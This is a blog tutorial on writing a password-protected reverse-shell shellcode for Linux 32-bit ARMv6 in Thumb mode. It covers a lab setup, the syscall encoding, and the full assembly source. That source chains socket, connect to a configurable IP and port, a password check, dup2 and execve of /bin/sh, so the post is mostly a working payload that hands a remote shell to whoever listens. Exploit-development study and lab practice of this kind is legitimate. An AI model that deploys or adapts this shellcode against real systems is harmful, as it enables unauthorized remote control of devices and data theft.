After having written a similar payload for Linux/Intel x64 I was curious about how to apply this knowledge for other architectures so I decided to go with ARM since it’s an interesting and wide-spread one.
ARM is a Reduced Instruction Set Computing (RISC) processor architecture that is used everywhere these days: mobile phones, smart thermostats, tv’s, wi-fi dongles, cars, credit cards, you name it.
Here are some key takeaways:
In order to switch to Thumb state, we can make use of the Branch and Exchange instruction (bx) after having set the destination register’s least significant bit to 1. This can be achieved by adding 1 to the Program Counter (pc register) while on ARM state.
<some arm code>
...
// Here we are running on ARM state
add r0, pc, #1
// Increase value of PC by 1 and place the result into r0
bx r0
// Branch & Exchange to the address in r0
// This will make the switch to Thumb state because the LSB of r0 = 1
// From here on we can execute Thumb state instructions!
<some thumb code>
...
From now one all the coding will be done in Thumb state since this is the relevant state for writing shellcode.
First of all, we’ll need a lab to run our tests on. Here are some options for it:
1.You can go for the real deal and test the payload on a real Raspberry Pi 1.
2. You can build/run an emulated environment using Qemu. Since I used the Qemu armv6_stretch image from this repo I’d recommend you use the same setup. It pretty much works off-the-shelf, don’t worry.
3. You could download and use the VM provided by Azeria Labs.
First of all, what are we trying to achieve here? Our goal is to write shellcode for the Linux 32-bit ARMv6 architecture that will connect back to a remote location over TCP/IPv4 and provide a shell only after the remote client provides a valid password. In order to write the payload, we need to chain several syscalls. The exact order is the following:
Each of these syscalls has a signature we need to address. Certain registers must contain specific values. For example, the r7 register is used to identify the syscall that is executed so it should always contain the syscall number. A whole document containing a full syscall table can be found here.
Photo credit: Webaroo.com.au
Let’s see an example of how to write a syscall in ARM Thumb state. We’ll use the socket syscall:
// [281] socket(2, 1, 0)
02 20 mov r0, #2 // loads immediate value 2 into r0
01 21 mov r1, #1 // loads immediate value 1 into r1
52 40 eor r2, r2 // zero-outs r2 by xoring it with itself
// 281 is out of range for immediate values
// It must be loaded in parts
c8 27 mov r7, #200 // part1: loads immediate value 200 into r7
51 37 add r7, #81 // part2: adds 81 to r7 as (syscall number)
01 df svc #1 // issues the syscall
Here you can see:
Armed with all our knowledge we are now prepared to chain every syscall and put together our payload. The following Gist was extracted from the source code on my main repository:
// Password-Protected Reverse Shell Linux/ARMv6
// Author: Alan Vivona
// medium.syscall59.com
// @syscall59
.section .text
.global _start
_start:
.arm
add r3, pc, #1 // switch to thumb mode
bx r3
.thumb
// [281] socket(2, 1, 0)
mov r0, #2
mov r1, #1
eor r2, r2
mov r7, #200
add r7, #81
svc #1
mov r10, r0 // save sockfd into r10
// [283] connect(socketfd, target, addrlen)
// socket fd is in r0 already
adr r1, target
strb r2, [r1, #1] // replace the 0xff value of the protocol field with a 0x00
strb r2, [r1, #5] // replace the 1st '255' values of the IP field with a 0
strb r2, [r1, #6] // replace the 2nd '255' values of the IP field with a 0
mov r2, #16
add r7, #2 // 281 + 2 = 283
svc #1
// [003] read(sourcefd, destbuffer, amount)
push {r1}
mov r1, sp
mov r2, #4
mov r7, #3
read_pass:
mov r0, r10
svc #1
check_pass:
ldr r3, pass
ldr r4, [r1]
eor r3, r3, r4
bne read_pass
// [063] dup2(sockfd, stdIO)
mov r1, #2 // r1 = 2 (stderr)
mov r7, #63 // r7 = 63 (dup2)
loop_stdio:
mov r0, r10 // r0 = saved sockfd
svc #1
sub r1,#1
bpl loop_stdio // loop while r1 >= 0
// [011] execve(command, 0, 0)
adr r0, command
eor r2, r2
eor r1, r1
strb r2, [r0, #7]
mov r7, #11
svc #1
// 2 bytes aligment fix if needed (can't use a nop as it has a null byte)
// align_bytes : .byte 0xff, 0xff
target:
// The 0xff will be replaced with a null on runtime
.ascii "\x02\xff" // Protocol: IPv4/TCP.
.ascii "\x11\x5c" // Port : 4444
// The '255' will be replaced with a 0 on runtime
.byte 127,255,255,1 // IP: 127.0.0.1.
command: .ascii "/bin/sh?" // The '?' will be replaced with a null on runtime
pass: .ascii "S59!"
When testing the payload take in consideration that it was crafted for Linux 32-bit ARMv6 (the same chip the Raspberry Pi 1 has). Some quirks may be needed for it to work on other platforms/architectures. In the following video, you can see the whole process of booting up the Qemu armv6 image, assembly of the payload and, finally, the test:
That’s all! Hope you enjoyed this one!
The full source code can be found on my GitHub repo and Exploit-DB. Follow me on Twitter and Medium for more content like this!